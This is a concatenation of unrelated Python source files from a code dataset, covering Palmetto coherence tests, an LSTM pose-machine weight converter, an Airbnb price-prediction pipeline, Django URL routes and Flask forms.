palmetto.get_coherence(words, coherence_type=coherence_type)
def test_wrong_content_type(words):
palmetto = Palmetto()
with pytest.raises(WrongContentType):
palmetto._request_by_service(words, "cv", "bla")
def test_all_content_types(words):
palmetto = Palmetto()
for content_type in ["text", "bytes"]:
palmetto._request_by_service(words, "umass", content_type)
def test_get_df_for_words(words):
palmetto = Palmetto()
doc_ids = palmetto.get_df_for_words(words)
for i in range(0, len(words)):
assert(doc_ids[i][0] == words[i])
def test_get_df_for_words_underscore(words_underscore):
"""
This test case fails for some unknown reason
Fails. Palmetto can not handle underscores.
"""
palmetto = Palmetto()
doc_ids = palmetto.get_df_for_words(words_underscore)
for i in range(0, len(words_underscore)):
assert(doc_ids[i][0] == words_underscore[i])
def test_get_df_for_words_with_no_results(words_no_results):
"""
This test case fails for some unknown reason
Fails. Palmetto can not handle underscores.
"""
palmetto = Palmetto()
doc_ids = palmetto.get_df_for_words(words_no_results)
for i in range(0, len(words_no_results)):
assert(doc_ids[i][0] == words_no_results[i])
| 2.40625 | 2 |
example/LSTMPoseMchine/converted/network_convert.py | ddddwee1/SULT | 18 | 12795747 | import model3 as M
import numpy as np
import tensorflow as tf
params = np.load('lstmpm_d1.npy').item()
params2 = np.load('lstmpm_d2.npy').item()
def get_conv(name):
res = []
# print(params[name])
res.append(params[name]['weights'])
res.append(params[name]['bias'])
# print(res[0].shape)
return res
def get_conv2(name):
res = []
# print(params[name])
res.append(params2[name]['weights'])
res.append(params2[name]['bias'])
# print(res[0].shape)
return res
class Stage0(M.Model):
def initialize(self):
# init encoding
self.c1_s1 = M.ConvLayer(9, 128, pad='SAME_LEFT', activation=M.PARAM_RELU, values=get_conv('conv1_stage1'))
self.p1_s1 = M.MaxPool(3, 2, pad='VALID')
self.c2_s1 = M.ConvLayer(9, 128, pad='SAME_LEFT', activation=M.PARAM_RELU, values=get_conv('conv2_stage1'))
self.p2_s1 = M.MaxPool(3, 2, pad='VALID')
self.c3_s1 = M.ConvLayer(9, 128, pad='SAME_LEFT', activation=M.PARAM_RELU, values=get_conv('conv3_stage1'))
self.p3_s1 = M.MaxPool(3, 2, pad='VALID')
self.c4_s1 = M.ConvLayer(5, 32, pad='SAME_LEFT', activation=M.PARAM_RELU, values=get_conv('conv4_stage1'))
self.c5_s1 = M.ConvLayer(9, 512, pad='SAME_LEFT', activation=M.PARAM_RELU, values=get_conv('conv5_stage1'))
self.c6_s1 = M.ConvLayer(1, 512, activation=M.PARAM_RELU, values=get_conv('conv6_stage1'))
self.c7_s1 = M.ConvLayer(1, 15, values=get_conv('conv7_stage1'))
# frame encoding
self.c1_s2 = M.ConvLayer(9, 128, pad='SAME_LEFT', activation=M.PARAM_RELU, values=get_conv('conv1_stage2'))
self.p1_s2 = M.MaxPool(3, 2, pad='VALID')
self.c2_s2 = M.ConvLayer(9, 128, pad='SAME_LEFT', activation=M.PARAM_RELU, values=get_conv('conv2_stage2'))
self.p2_s2 = M.MaxPool(3, 2, pad='VALID')
self.c3_s2 = M.ConvLayer(9, 128, pad='SAME_LEFT', activation=M.PARAM_RELU, values=get_conv('conv3_stage2'))
self.p3_s2 = M.MaxPool(3, 2, pad='VALID')
self.c4_s2 = M.ConvLayer(5, 32, pad='SAME_LEFT', activation=M.PARAM_RELU, values=get_conv('conv4_stage2'))
# center map
self.pool = M.AvgPool(9,8, pad='VALID')
# LSTM0
self.g = M.ConvLayer(3, 48, pad='SAME_LEFT', values=get_conv('g_x_stage2'))
self.gb = tf.convert_to_tensor(params['g_stage2'][1].astype(np.float32))
self.gb = tf.Variable(self.gb)
self.i = M.ConvLayer(3, 48, pad='SAME_LEFT', values=get_conv('i_x_stage2'))
self.ib = tf.convert_to_tensor(params['i_stage2'][1].astype(np.float32))
self.ib = tf.Variable(self.ib)
self.o = M.ConvLayer(3, 48, pad='SAME_LEFT', values=get_conv('o_x_stage2'))
self.ob = tf.convert_to_tensor(params['o_stage2'][1].astype(np.float32))
self.ob = tf.Variable(self.ob)
# decoder branch
self.mc1 = M.ConvLayer(11, 128, pad='SAME_LEFT', activation=M.PARAM_RELU, values=get_conv('Mconv1_stage2'))
self.mc2 = M.ConvLayer(11, 128, pad='SAME_LEFT', activation=M.PARAM_RELU, values=get_conv('Mconv2_stage2'))
self.mc3 = M.ConvLayer(11, 128, pad='SAME_LEFT', activation=M.PARAM_RELU, values=get_conv('Mconv3_stage2'))
self.mc4 = M.ConvLayer(1, 128, activation=M.PARAM_RELU, values=get_conv('Mconv4_stage2'))
self.mc5 = M.ConvLayer(1, 15, values=get_conv('Mconv5_stage2'))
def forward(self, dt1, dt2, centermap):
#init enc
e = dt1
e = self.c1_s1(e)
e = tf.pad(e, [[0,0],[0,1],[0,1],[0,0]], mode='SYMMETRIC')
e = self.p1_s1(e)
e = self.c2_s1(e)
e = tf.pad(e, [[0,0],[0,1],[0,1],[0,0]], mode='SYMMETRIC')
e = self.p2_s1(e)
e = self.c3_s1(e)
e = tf.pad(e, [[0,0],[0,1],[0,1],[0,0]], mode='SYMMETRIC')
e = self.p3_s1(e)
e = self.c4_s1(e)
e = self.c5_s1(e)
e = self.c6_s1(e)
e = self.c7_s1(e)
# frame encoding
f = dt2
f = self.c1_s2(f)
f = tf.pad(f, [[0,0],[0,1],[0,1],[0,0]], mode='SYMMETRIC')
f = self.p1_s2(f)
f = self.c2_s2(f)
f = tf.pad(f, [[0,0],[0,1],[0,1],[0,0]], mode='SYMMETRIC')
f = self.p2_s2(f)
f = self.c3_s2(f)
f = tf.pad(f, [[0,0],[0,1],[0,1],[0,0]], mode='SYMMETRIC')
f = self.p3_s2(f)
f = self.c4_s2(f)
# centermap pooling
x = tf.pad(centermap, [[0,0],[0,1],[0,1],[0,0]], mode='SYMMETRIC')
x = self.pool(x)
# LSTM branch
x = tf.concat([f, e, x], axis=-1)
g = self.g(x) + self.gb
i = self.i(x) + self.ib
o = self.o(x) + self.ob
g = tf.tanh(g)
i = tf.sigmoid(i)
o = tf.sigmoid(o)
c = g * i
h = o * tf.tanh(c)
# decoder branch
x = self.mc1(h)
x = self.mc2(x)
x = self.mc3(x)
x = self.mc4(x)
out = self.mc5(x)
return out
class Stage1(M.Model):
def initialize(self):
# frame encoding
self.c1_s2 = M.ConvLayer(9, 128, pad='SAME_LEFT', activation=M.PARAM_RELU, values=get_conv2('conv1_stage2'))
self.p1_s2 = M.MaxPool(3, 2, pad='VALID')
self.c2_s2 = M.ConvLayer(9, 128, pad='SAME_LEFT', activation=M.PARAM_RELU, values=get_conv2('conv2_stage2'))
self.p2_s2 = M.MaxPool(3, 2, pad='VALID')
self.c3_s2 = M.ConvLayer(9, 128, pad='SAME_LEFT', activation=M.PARAM_RELU, values=get_conv2('conv3_stage2'))
self.p3_s2 = M.MaxPool(3, 2, pad='VALID')
self.c4_s2 = M.ConvLayer(5, 32, pad='SAME_LEFT', activation=M.PARAM_RELU, values=get_conv2('conv4_stage2'))
# center map
self.pool = M.AvgPool(9,8, pad='VALID')
# lstm
self.gx = M.ConvLayer(3, 48, pad='SAME_LEFT', values=get_conv2('g_x_stage3'))
self.gh = M.ConvLayer(3, 48, pad='SAME_LEFT', values=get_conv2('g_h_stage3'))
self.gb = tf.convert_to_tensor(params2['g_stage3'][1].astype(np.float32))
self.gb = tf.Variable(self.gb)
self.fx = M.ConvLayer(3, 48, pad='SAME_LEFT', values=get_conv2('f_x_stage3'))
self.fh = M.ConvLayer(3, 48, pad='SAME_LEFT', values=get_conv2('f_h_stage3'))
self.fb = tf.convert_to_tensor(params2['f_stage3'][1].astype(np.float32))
self.fb = tf.Variable(self.fb)
self.ox = M.ConvLayer(3, 48, pad='SAME_LEFT', values=get_conv2('o_x_stage3'))
self.oh = M.ConvLayer(3, 48, pad='SAME_LEFT', values=get_conv2('o_h_stage3'))
self.ob = tf.convert_to_tensor(params2['o_stage3'][1].astype(np.float32))
self.ob = tf.Variable(self.ob)
self.ix = M.ConvLayer(3, 48, pad='SAME_LEFT', values=get_conv2('i_x_stage3'))
self.ih = M.ConvLayer(3, 48, pad='SAME_LEFT', values=get_conv2('i_h_stage3'))
self.ib = tf.convert_to_tensor(params2['i_stage3'][1].astype(np.float32))
self.ib = tf.Variable(self.ib)
# decoder branch
self.mc1 = M.ConvLayer(11, 128, pad='SAME_LEFT', activation=M.PARAM_RELU, values=get_conv2('Mres1_stage3'))
self.mc2 = M.ConvLayer(11, 128, pad='SAME_LEFT', activation=M.PARAM_RELU, values=get_conv2('Mres2_stage3'))
self.mc3 = M.ConvLayer(11, 128, pad='SAME_LEFT', activation=M.PARAM_RELU, values=get_conv2('Mres3_stage3'))
self.mc4 = M.ConvLayer(1, 128, activation=M.PARAM_RELU, values=get_conv2('Mres4_stage3'))
self.mc5 = M.ConvLayer(1, 15, values=get_conv2('Mres5_stage3'))
def forward(self, x, hmap, centermap, h, c):
# frame encoding
f = x
f = self.c1_s2(f)
f = tf.pad(f, [[0,0],[0,1],[0,1],[0,0]], mode='SYMMETRIC')
f = self.p1_s2(f)
f = self.c2_s2(f)
f = tf.pad(f, [[0,0],[0,1],[0,1],[0,0]], mode='SYMMETRIC')
f = self.p2_s2(f)
f = self.c3_s2(f)
f = tf.pad(f, [[0,0],[0,1],[0,1],[0,0]], mode='SYMMETRIC')
f = self.p3_s2(f)
f = self.c4_s2(f)
# centermap pooling
ce = tf.pad(centermap, [[0,0],[0,1],[0,1],[0,0]], mode='SYMMETRIC')
ce = self.pool(ce)
# lstm branch
x = tf.concat([f, hmap, ce], axis=-1)
gx = self.gx(x)
gh = self.gh(h)
ox = self.ox(x)
oh = self.oh(h)
fx = self.fx(x)
fh = self.fh(h)
ix = self.ix(x)
ih = self.ih(h)
g = tf.tanh(gx + gh + self.gb)
o = tf.sigmoid(ox + oh + self.ob)
i = tf.sigmoid(ix + ih + self.ib)
f = tf.sigmoid(fx + fh + self.fb)
c = f*c + i*g
h = o * tf.tanh(c)
# decoder branch
x = self.mc1(h)
x = self.mc2(x)
x = self.mc3(x)
x = self.mc4(x)
out = self.mc5(x)
return out
class ModelBundle(M.Model):
def initialize(self):
self.s0 = Stage0()
self.s1 = Stage1()
if __name__=='__main__':
mods = ModelBundle()
mod = mods.s0
x = np.ones([1,368,368,3]).astype(np.float32)
cent = np.ones([1,368,368,1]).astype(np.float32)
x = mod(x, x, cent)
out = np.transpose(x,[0,3,1,2])
print(out)
print(out.shape)
input('Test deploy1 finished. Input for testing deploy2')
mod = mods.s1
x = np.ones([1,368,368,3]).astype(np.float32)
cent = np.ones([1,368,368,1]).astype(np.float32)
h = c = np.ones([1,46,46, 48]).astype(np.float32)
hmap = np.ones([1,46,46, 15]).astype(np.float32)
x[:,-1] = 0
x = mod(x, hmap, cent, h, c)
out = np.transpose(x,[0,3,1,2])
print(out)
print(out.shape)
input('Test deploy2 finished. Input for saving converted weights ')
saver = M.Saver(mods)
saver.save('./LSTMPM/lstmpm.ckpt')
| 2.34375 | 2 |
src/analysis/analysis.py | burakbalaban/airbnb_project | 0 | 12795748 | <reponame>burakbalaban/airbnb_project
import sys
import numpy as np
import pandas as pd
import xgboost as xgb
from numba import jit
from numba import prange
from sklearn.model_selection import RandomizedSearchCV
from bld.project_paths import project_paths_join as ppj
def list_generator(keyword):
"""Function for getting the variable names from txt file
and converting into a list.
Args:
keyword (str): the name of txt file
Returns:
the list of variable names
"""
with open(ppj("IN_SPECS", keyword + ".txt"), "r") as f:
var_read = f.read()
return list(var_read.split("\n"))
def rule_func(var_list, dataset, rule):
"""Function for applying data management rule on dataset with given variable names.
Variable names should match with dataset's column names.
Defined rules are exclusion, conversion and length generation.
Exclusion(exclude) rule excludes variable from the dataset.
Conversion(convert) rule converts "f" and "t" values into 0 and 1 respectively.
Thus variable should have values either "f" or "t".
Length generator(lengthen) rule gets the string lenght,
adds "_len" to variable name and exclude variable from dataset.
Args:
| var_list (list): list of variables to apply
| dataset (pd.Dataframe): dataset to implement the rule
| rule (str): can take values 'exclude', 'convert' or 'lengthen'
Returns:
the altered dataset (pd.Dataframe)
"""
if rule == "exclude":
dataset = dataset.drop(var_list, axis=1)
elif rule == "convert":
for c in var_list:
dataset[c] = dataset[c].replace({"f": 0, "t": 1})
elif rule == "lengthen":
for l in var_list:
dataset[l + "_len"] = dataset[l].str.len()
dataset = dataset.drop(l, axis=1)
else:
raise ValueError("Rule is not defined")
return dataset
@jit(nopython=True)
def distance_calc(house, venue):
"""Function for calculating the distance between
a house and a venue while taking world's shape into consideration.
Args:
| house (list): list including latitude and longitude of a house
| venue (list): list including latitude and longitude of a venue
Returns:
the approximate distance (float)
"""
# approximate radius of earth in km
R = 6373.0
house_lat = np.deg2rad(house[0])
house_lng = np.deg2rad(house[1])
venue_lat = np.deg2rad(venue[0])
venue_lng = np.deg2rad(venue[1])
dist = (
np.sin((venue_lat - house_lat) / 2) ** 2
+ np.cos(house_lat)
* np.cos(venue_lat)
* np.sin((venue_lng - house_lng) / 2) ** 2
)
return 2 * R * np.arcsin(np.sqrt(dist))
def score_func(house_data, venue_data):
"""Function for calculating location-based score of a house.
Function gets a house and venues within 1 km radius of that house,
calculates each venue's influential score on that house with dividing
venue's check-in count with the distance.
With that division, score is adjusted to popularity and distance.
In the end, that house's score is the mean of relevant venues' influential scores.
Args:
| house_data (pd.Dataframe): airbnb dataset including house features
especially latitude, longitude
| venue_data (pd.Dataframe): dataset with venues' latitude, longitude
and check_in_counts
Returns:
house_data with additional column called location_score (pd.Dataframe)
"""
# coordinates should be tuples for geopy.distance function
venue_data_list = np.array(
list(zip(venue_data.latitude, venue_data.longitude, venue_data.check_in_counts))
)
house_data_coordinate = np.array(
list(zip(house_data.latitude, house_data.longitude))
)
location_score_list = np.empty([len(house_data), 1])
def numba_func(venue_data_list, house_data_coordinate):
"""Inside function for numba application.
"""
for house in prange(len(house_data_coordinate)):
# Preliminary elimination based on coordinates
red_venue_list = np.array(
list(
filter(
lambda x: (
x[0] - house_data_coordinate[0][0] < 0.01
) # latitude
& (x[1] - house_data_coordinate[0][1] < 0.01), # longitude
venue_data_list,
)
)
)
score_list = np.array(0)
for ven in prange(len(red_venue_list)):
cal_dist = distance_calc(
house_data_coordinate[house], red_venue_list[ven][0:2]
)
if cal_dist < 1: # venues closer than 1 km
np.append(score_list, red_venue_list[ven][2] / cal_dist)
np.append(location_score_list, np.mean(score_list))
return location_score_list
location_score_list = numba_func(venue_data_list,house_data_coordinate)
house_data["location_score"] = location_score_list
return house_data
def dummy_func(data, column_list):
"""Function for creating dummy variable columns out of defined columns.
Created dummy columns have the name of source column as prefix and "_".
Function drops the source column from the dataset.
Args:
| data (pd.Dataframe): dataset of interest contaning columns with categorical data
| column_list (list): list of columns to get dummy variables
Returns:
the altered dataset with dummy variable columns (pd.Dataframe)
"""
for column in column_list:
temp_data = pd.get_dummies(data[column]).add_prefix(str(column + "_"))
data = data.drop(column, axis=1)
data = pd.concat([data, temp_data], axis=1)
return data
def data_management(date, venue_data, g_data):
"""Function for data management.
It loads the airbnb dataset and rearranges both airbnb and generated
dataset for prediction.
A certain amount of house features are excluded, the list can be found
in src/specs/var_exclude.txt.
In addition, for some features only the length is considered,
similarly listed in src/specs/var_len.txt.
Args:
| date (str): a part of airbnb dataset's name also indicating scraping date
| venue_data (pd.Dataframe): the dataset including venues' information
| g_data (pd.Dataframe): randomly generated house features for prediction
Returns:
| data (pd.Dataframe): the cleared, ready-for-modelling, dataset
| g_data (pd.Dataframe): the altered generated data
"""
with open(ppj("IN_DATA", "Airbnb_data/" + date + "_listings.csv"), "rb") as d:
data = pd.read_csv(d, low_memory=False)
# Data clearing process
rule_list = ["exclude", "convert", "lengthen"]
for rule in rule_list:
var_list = list_generator(keyword="var_" + rule)
data = rule_func(var_list=var_list, dataset=data, rule=rule)
# Only include apartments and exclude Shared rooms for simplicity
data = (
data.loc[
(data["room_type"] != "Shared room")
& (data["property_type"] == "Apartment"),
]
.copy()
.reset_index()
)
# Calculate the location score of each house
data = score_func(house_data=data, venue_data=venue_data)
# Preparing data for modelling
data = dummy_func(
data=data, column_list=["room_type", "bed_type", "cancellation_policy"]
)
g_data = dummy_func(
data=g_data, column_list=["room_type", "bed_type", "cancellation_policy"]
)
# Drop remaining unnecessary columns in case of differences in airbnb datasets
col_list = list(g_data.columns)
col_list.append("price")
data = data.filter(col_list, axis=1)
nan_fill_list = [
"host_is_superhost",
"host_listings_count",
"host_has_profile_pic",
"host_identity_verified",
"location_score",
]
for item in nan_fill_list:
data[item] = data[item].fillna(0)
currency_list = ["price", "security_deposit", "cleaning_fee", "extra_people"]
for item in currency_list:
data[item] = data[item].fillna("$0.00")
data[item] = data[item].str.replace(",", "").str.extract(r"(\d+)").astype(int)
return data, g_data
def prediction_func(data, g_data, grid_search, param_list):
"""Function for using dataset to train a model and
predicting prices for a generated data.
Parameter search is done using RandomizedSearchCV since it is computationally
more efficientcompared to GridSearchCV.
In param_list, learning_rate, subsample and max_depth,
min_child_weight, gamma and colsample_bytree can be included.
Args:
| data (pd.Dataframe): the dataset including house features and prices
| g_data (pd.Dataframe): randomly generated house features for prediction purposes
| grid_search (bool): indicates whether model is trained with parameter
search(True) or use default values(False)
| param_list (list): the list of parameters to be included in parameter search
Returns:
the predicted prices for houses in g_data (np.array)
"""
# Base Model
xgb_reg = xgb.XGBRegressor(n_treads=-1)
if grid_search:
# Search for best parameters in model
params = {
"learning_rate": [i / 20 for i in range(1, 11)],
"min_child_weight": [i for i in range(3, 12)],
"gamma": [i / 10.0 for i in range(3, 8)],
"subsample": [i / 10.0 for i in range(7, 11)],
"colsample_bytree": [i / 10.0 for i in range(6, 11)],
"max_depth": [i for i in range(3, 8)],
}
# Only includes selected parameters
params = {key: params[key] for key in param_list}
xgb_reg = RandomizedSearchCV(
estimator=xgb_reg,
param_distributions=params,
n_iter=5,
cv=3,
random_state=23,
iid=False,
)
xgb_reg.fit(data.drop("price", axis=1), data.price)
return xgb_reg.predict(g_data)
if __name__ == "__main__":
# Load data
with open(ppj("OUT_DATA", "reduced_check_in_dataset.csv"), "rb") as c:
reduced_venue = pd.read_csv(c)
with open(ppj("OUT_DATA", "generated_house_data.csv"), "rb") as g:
generated_data = pd.read_csv(g)
date = sys.argv[1]
data, generated_data = data_management(
date=date, venue_data=reduced_venue, g_data=generated_data
)
prediction = prediction_func(
data=data,
g_data=generated_data,
grid_search=True,
param_list=["learning_rate", "subsample", "max_depth"],
)
predicted_df = pd.DataFrame(prediction, columns=[date])
# Out data
with open(ppj("OUT_PREDICTION", f"{date}_prediction.csv"), "w") as p:
predicted_df.to_csv(p, index=False)
| 3.328125 | 3 |
Django/StockDash/Stock/urls.py | gankersky/Stock | 0 | 12795749 | from django.urls import path, re_path
from . import views
# 这是应用Book中的url具体配置,请求到这里才能调用该应用的视图,上一级首先是调用BookManager的url,如果没有匹配admin
# 那么进入应用的匹配Book.urls,之后才会进入这里应用的url
urlpatterns = [
# http://127.0.0.1:8000/admin/ 匹配
# 正则匹配,对请求地址进行正则匹配,如果路径中包含admin,就把后台站点中的url信息包含到这个项目中,指明下一集路径如何匹配
# 如果匹配成功,那么直接调用指定的视图
# 正则匹配,对请求地址进行正则匹配,如果路径中不包含admin,就把Book中的url信息包含到这个项目中,指明下一集路径如何匹配
path('stockplot/', views.showlinediagram),
path('index3', views.index3,name='index3'),
path('json1', views.json1),
# ex:/assetinfo/json2
path('json2', views.json2),
path('ajax_add/', views.ajax_add),
path('ajax_demo1/', views.ajax_demo1),
path('data_fresh/', views.data_fresh, name="data_fresh"),
path('stocklist/', views.stockList), # 这里的^表示开始,$表示结束,因为是正则表达式,所以必须严格
re_path(r'^([1-9]\d*)/$', views.dashBoard_m) # 调函数的时候传参数,采用正则的组,正则匹配加括号,然后传进去参数,按照顺序传
# 这里的地址最重要,代表了访问的url地址后面
] | 2.203125 | 2 |
app/room/forms.py | kid-kodi/BioBank | 0 | 12795750 | <filename>app/room/forms.py
from flask import request
from flask_wtf import FlaskForm
from wtforms import StringField, SubmitField, TextAreaField, SelectField
from wtforms.validators import ValidationError, DataRequired, Length
from flask_babel import _, lazy_gettext as _l
from app.models import Room
class SearchForm(FlaskForm):
name = StringField(_l('Nom de la salle'))
submit = SubmitField('Rechercher')
class RoomForm(FlaskForm):
name = StringField(_l('Nom de la salle'), validators=[DataRequired()])
submit = SubmitField(_l('Enregistrer'))
| 2.40625 | 2 |
Subsets and Splits